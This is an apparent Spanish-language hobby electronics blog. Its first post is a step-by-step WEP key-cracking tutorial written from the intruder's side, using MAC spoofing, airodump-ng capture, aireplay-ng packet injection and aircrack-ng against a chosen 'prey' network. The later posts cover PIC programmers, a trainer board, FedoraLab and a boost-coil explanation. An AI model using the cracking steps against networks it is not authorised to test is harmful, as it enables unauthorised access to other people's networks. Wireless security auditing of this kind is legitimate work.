romper claves wep seguridad WiFi macchanger aircrack-ng airodump-ng aireplay-ng

Bueno la informormacion en este blog sobre todo este tema el uso que ustedes le den ya sea bueno o malo es responsabilidad unicamente de ustedes lo pongo por que alguien que conosco quiere saber si alguien mas  esta conectado a su modem inalambrico. el ejemplo que muestro es siendo el intruso
La verdad me da un poco de flojera por que solo vamos abordar claves WEP

abrimos una terminal y tipeamos                                   iwconfig
esto para saber cual es la interfase de nuestra
tarjeta inalambrica de red en este caso es wlan0
luego tipeamos                                                     ifconfig wlan0 down
esto para poder cambiar la direccion MAC  de
nuestra tarjeta inalambrica ya se imaginaran
para que 
tercero introducimos                       macchanger -m 00:11:22:33:44:55 wlan0

bueno ya tenemos lo basico empesamos a monitorear
lo que hay cerca de nuestra area volvemos a
tipear  en consola                                             airodump-ng -w captura wlan0
donde captura es el nombre del archivo que
contendra los paquetes capturados

aparecera algo como esto

con esto ya podriamos usar el aircrack pero tardariamos mucho para reunir los caps necesarios ya que si se dan cuanta solo le dedica unos momentos a cada canal para capturar paquetes por eso nos enfocaremos a un canal y a una essid
elejimos nuestra presa  chequen cual tiene mejor calidad y mas potencia en este caso ninguna  pero elejimos una direccion que tenga asosiada una estasion

en otra terminal escribimos                                ifconfig wlan0 down
volvemos a usar el macchanger para cambiar
nuestra mac a la de la estacion asosiada esto
es para que el ataque que vamos a usar tenga
mejor resultados
                                                      macchanger -m xx:xx:xx:xx:xx:xx wlan0

este es el comando ya personalizado para nuestra victima

airodump-ng -w  presa --bssid xx:xx:xx:xx:xx:xx --channel 6 --ivs wlan0

ivs es el tipo de paquete que va a capturar airodump en el canal 6 
 

saldra algo como esto 

pero si se fijan esto tambien es muy lento apesar que es solo un canal de captura solo tiene capturado 27 paquetes por eso vamos atacar para que sean minimo 20 mil

abrimos otra termina y pondremos nuestro comando

aireplay-ny -3 -b xx:xx:xx:xx:xx:xx  -h xx:xx:xx:xx:xx:xx -x300 wlan0

-b seguido la direccion bssid que estamos capturando -h seguido de nuestra direccion mac falsa (la direccion de la tarjeta que si esta asosiada al bssid)
-x 300 la cantidad de paquetes que enviaremos en un segundo y esto tendremos

y ya estamos listos para usar el aircrack-ng

en otra terminal tipeamos                 aircrack-ng  -y presa-01.ivs
-y es opsion de la busqueda de la clave WEP y presa-01.ivs el el tipo de archivo que genero airodump-ng

airodump-ng
aireplay-ng
aircrack-ng
si escriben  cada comando les dara varias opsiones que pueden usar para mejorar su busqueda de intrusos y mejorar su seguridad

despues de esto voy a tener que contratar un modem con clave WAP

pic trainer simple pic18f2550

 Aqui les dejo un proyecto personal de una tarjeta entrenadora para el pic18f2550 si se dan cuenta esta diseñada para poder intercambiar salidas por entradas o viceversa solo tienen que hacer las tarjetas que gusten controlar o para probar su programa. en realidad es muy simple espero les ayude para que ustedes tengan una idea de como empezar a diseñar su propia tarjeta entrenadora su alimentacion es externa de 5 volts tambien la pueden alimentar por medio del usb de su computadora pero no se los recomiendo si no estan muy familiarizados con la tarjeta
si desean el proyecto completo en kicad manden un correo a lopelectron@gmail.com y se los envio

GNU/Linux fedora lab

aqui les dejo una de mis distribuciones preferidas FedoraLab
esta enfocada para  electronicos asi que viene con gran cantidad
de programas de simulacion, diseño y calculo de circuitos electronicos
la pueden descargar en la pagina oficial de fedora

Brenner_8 programador de pic's

El programador Brenner_8 es un programador de PIC's nuevo
de origen Alemán y trabaja en Linux es muy fácil de usar

su pagina oficial es:
http://www.sprut.de/electronic/pic/projekte/brenner8/index.htm

La información esta un poco limitada por ser un proyecto
nuevo y por el idioma pero los que ya están familiarizados
con los pic's no se le dificultara
por el momento subiré el proyecto del programador por supuesto
en kicad este programador esta bajo la licencia GPL2

todos los créditos y agradecimientos son para: www.sprut.de

mas adelante explicare su instalación y su calibración en Linux
y también subiré proyectos propios como un PICTRAINER, DRIVE
para motores de paso y si todo sale bien un
DRIVE para maquinas CNC


Brenner_8 en Kicad

Bobina 680uH

Es hora de explicar la función de la bobina L1 (680uH) en el programador

Hay que recordar de que en una bobina la corriente alterna se
desfasa 90° con respecto al voltaje de ahí partimos.

si se fijan en el diagrama del programador en este caso pickit2 clon   
uno de los extremos de la bobina esta conectada al +V del USB que son 5 volts
y del otro extremo esta conectado al colector del transistor Q2 y al ánodo
del diodo D3. Q2 esta trabajando en saturación y corte controlado por el mismo
microcontralor por medio del pin 12 que esta configurado como PWM (pulsos de
anchura modulada) y el diodo D2 su función es rectificar los picos generados
por dichos pulsos.
El transistor Q2 al estar en saturación ocasiona que la bobina en el extremo
(donde esta conectado al colector y al ánodo del D3) su voltaje se vaya a
cero y cuando esta en corte se genera un pico de voltaje que rebasa los
5 volts, generando picos de asta 14 volts dependiendo de la modulación de los
pulsos (PWM) esto por el efecto de desfasamiento de la corriente.

La bobina almacena energía eléctrica en forma de campo magnético cuando
aumenta la intensidad de corriente, devolviéndola cuando ésta disminuye

entonces el diodo D3 se encarga de rectificar ese voltaje elevado.
Si vuelven a observar el diagrama en el cátodo del diodo D3 esta el
capacitor CP3 que se encarga de filtrar el voltaje. Y un divisor de voltaje de dos resistencias (R7 y R10) que sirve para que el microcontrolador sense el voltaje resultante (VPP) para que el PIC ajuste la modulación de los pulsos en la base del transistor Q2

Para no entrar en mas detalles ni para hablar de la ley de Faraday ni la
ley de Lenz. La función de la bobina junto con el diodo D3 y el transistor Q2
multiplican el voltaje de 5 volts que viene del V+ del USB y lo eleva a 13 volts
necesarios para programar los PIC's de ahí que sea necesario que la bobina sea
lo mas cercana al valor de 680uH para que el microcontrolador pueda generar el voltaje de programación y también si no me equivoco para que el programador
por medio del firmware mande los datos de chequeo que todo esta OK a la computadora.

PicKit2 clon para Linux

Aquí traigo el famoso pickit2-clon es uno de los programadores de PIC's mas populares este programador esta soportado por el fabricante de dichos microcontroladores y se puede usar con su software. Otras ventajas con las que cuenta son su alta velocidad para programar, es compacto, su firmware se actualiza regularmente, se conecta por medio del USB y que creen lo detecta pikdev y piklab aunque este ultimo tiene algunos problemitas con algunos PIC's
se esta trabajando para eliminar esos fallos. la versión del firmware anterior (pickit2 V1.X.) trabaja muy  bien con piklab mas abajo dejo el link para descargar versiones anteriores. Algunos pensaran que usar un firmware anterior podria quitarles grandes ventajas pero no es asi y menos trabajando con GNU-Linux.

En la red hay varios diagramas y hasta a horita no me a tocado ninguno con errores es lo bueno de estar soportado por Microchip. Si buscas en san Google te saldrán varios, que el ultimate o el reloaded básicamente son los mismos  hay varios proyectos muy buenos como el de Felix o el Gatox. El que estoy subiendo es igual al de ellos pero este no tiene el arreglo de transistores para grabar memorias y en el pcb tengo deshabilitado el iscp auxiliar ademas el proyecto esta hecho sobre kicad para trabajar en gnu-linux aunque lo pueden usar en winditos

explicare mas adelante para que sirve esa maldita bobina de 680uH ya que nadie explica su función y prácticamente lo traen la mayoría de los programadores pickit2, GTPUSB-plus, Brenner etc.

 proyecto pickit2 clon para kicad y firmware
firmware anteriores para pickit2
 librerias lopelectron para kicad

un poco de Piklab

Esto es un pantallazo  de Piklab donde se muestra un problema de permisos con el puerto serial, no entraremos en detalles ya que si usan GNU-Linux es un tema muy comun en nuestra comunidad solo pondre el comando para que puedan trabajar con el JDM tiene que ser en una terminal y en modo root si tu gestor de ventanas es KDE piklab tiene una pestaña en la parte inferior del programa para abrir una terminal en el mismo programa pero como yo uso GNOME  tengo que abrir una terminal por medio del menu.

chmod 0666 /dev/ttyS0